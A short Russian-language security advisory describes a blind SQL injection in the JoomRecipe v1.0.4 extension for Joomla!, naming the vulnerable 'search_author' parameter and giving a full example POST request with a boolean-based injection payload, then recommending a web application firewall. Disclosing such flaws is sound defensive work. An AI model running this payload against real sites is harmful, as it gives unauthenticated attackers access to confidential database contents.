В компоненте JoomRecipe v1.0.4 для joomla! была найдена SQL-инъекция. Эта уязвимость позволяет злоумышленнику удаленно выполнять вредоносные SQL-команды для компрометации веб-приложения или доступа к базе данных.

JoomRecipe — это расширение рецептов, позволяющее эффективно управлять рецептами и кулинарными книгами внутри вашего joomla! сайта.

Уязвимость находится на странице поиска в параметре ‘search_author’ POST-запроса и представляет собой слепую SQL-инъекцию, эксплуатация которой позволяет любому неавторизованному пользователю получить доступ к конфиденциальной информации.

Пример эксплуатации уязвимости:

url: /search/results.html
data: searchPerformed=1&task=search&searchword=asd&searchCategories[]=*&search_cuisine=&searchSeasons=&search_author=(SELECT (CASE WHEN (8160=8160) THEN 8160 ELSE 8160*(SELECT 8160 FROM INFORMATION_SCHEMA.PLUGINS) END))&search_max_prep_hours=2&search_max_prep_minutes=0&search_max_cook_hours=2&search_max_cook_minutes=0&search_min_rate=0&search_max_cost=999¤tIngredient=

Использование Web Application Firewall позволяет блокировать подобные атаки